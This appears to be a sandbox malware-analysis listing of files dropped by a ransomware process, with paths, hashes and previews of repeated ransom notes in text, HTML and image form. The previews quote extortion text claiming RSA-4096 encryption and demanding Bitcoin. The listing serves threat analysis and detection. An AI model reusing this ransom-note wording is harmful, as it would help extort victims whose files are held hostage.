                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\WER\Temp\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\WER\Temp\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows\WER\Temp\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\WER\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\WER\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows\WER\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):62848
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkL
                  MD5:D8CEF461F8767D26948B8CD44CECF2E1
                  SHA1:537908FB65BAE7EB3C5917D9C5171D46522FEB18
                  SHA-256:017AD361A67C719BC8F05AB012CDC366912ABE6317853590F3979FA2C45D2E2D
                  SHA-512:778B6C27BF28FA4392F2C48FCE603FBF3192BFA548FA257AF0EAD3E9BA3FDA8A971EFC046CCF7DA389D78892E40313B4393A0469E0849880B9509570608C5235
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):542016
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCP
                  MD5:D6D12315C5392CB85E511974AE2BB7B4
                  SHA1:3B57D3392D90430B7B2423E566C4B3C64A3BA6FC
                  SHA-256:24E1941631CF2BD3A856BF94D4783325266D10E44EFD067B2E988780B8531916
                  SHA-512:9AEE5774C57BC36CA31E8053E17D287282C30B4077197D07A4EE91443C9DF31FA28AC93B5D5684E463647C8B317C15B8E2757D4C7AE38ABFE471CDB934FEF21F
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):16776
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5u
                  MD5:6CD7A7401C4FCBB8B45A6183CC9EE413
                  SHA1:4088A6DF18463B9191A745D5ABEC9C184B2BDEEE
                  SHA-256:DE76D63BAB99866338E4226F46B77095EFBDAA53134D8A6FF6928C901A6966B9
                  SHA-512:06D6C4A3B6D94DC7C2DA12525DD9D81E66A48418DBE510FDDCA50085240176DCBE34FFE050AAF949ABA89164B1561508D83B6545106ACBDFB2C046081F632D01
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\wfp\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\wfp\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows\wfp\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\WwanSvc\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):62848
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkL
                  MD5:D8CEF461F8767D26948B8CD44CECF2E1
                  SHA1:537908FB65BAE7EB3C5917D9C5171D46522FEB18
                  SHA-256:017AD361A67C719BC8F05AB012CDC366912ABE6317853590F3979FA2C45D2E2D
                  SHA-512:778B6C27BF28FA4392F2C48FCE603FBF3192BFA548FA257AF0EAD3E9BA3FDA8A971EFC046CCF7DA389D78892E40313B4393A0469E0849880B9509570608C5235
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\WwanSvc\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):542016
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCP
                  MD5:D6D12315C5392CB85E511974AE2BB7B4
                  SHA1:3B57D3392D90430B7B2423E566C4B3C64A3BA6FC
                  SHA-256:24E1941631CF2BD3A856BF94D4783325266D10E44EFD067B2E988780B8531916
                  SHA-512:9AEE5774C57BC36CA31E8053E17D287282C30B4077197D07A4EE91443C9DF31FA28AC93B5D5684E463647C8B317C15B8E2757D4C7AE38ABFE471CDB934FEF21F
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\WwanSvc\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):16776
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5u
                  MD5:6CD7A7401C4FCBB8B45A6183CC9EE413
                  SHA1:4088A6DF18463B9191A745D5ABEC9C184B2BDEEE
                  SHA-256:DE76D63BAB99866338E4226F46B77095EFBDAA53134D8A6FF6928C901A6966B9
                  SHA-512:06D6C4A3B6D94DC7C2DA12525DD9D81E66A48418DBE510FDDCA50085240176DCBE34FFE050AAF949ABA89164B1561508D83B6545106ACBDFB2C046081F632D01
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):62848
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkL
                  MD5:D8CEF461F8767D26948B8CD44CECF2E1
                  SHA1:537908FB65BAE7EB3C5917D9C5171D46522FEB18
                  SHA-256:017AD361A67C719BC8F05AB012CDC366912ABE6317853590F3979FA2C45D2E2D
                  SHA-512:778B6C27BF28FA4392F2C48FCE603FBF3192BFA548FA257AF0EAD3E9BA3FDA8A971EFC046CCF7DA389D78892E40313B4393A0469E0849880B9509570608C5235
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):542016
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCP
                  MD5:D6D12315C5392CB85E511974AE2BB7B4
                  SHA1:3B57D3392D90430B7B2423E566C4B3C64A3BA6FC
                  SHA-256:24E1941631CF2BD3A856BF94D4783325266D10E44EFD067B2E988780B8531916
                  SHA-512:9AEE5774C57BC36CA31E8053E17D287282C30B4077197D07A4EE91443C9DF31FA28AC93B5D5684E463647C8B317C15B8E2757D4C7AE38ABFE471CDB934FEF21F
                  Malicious:false
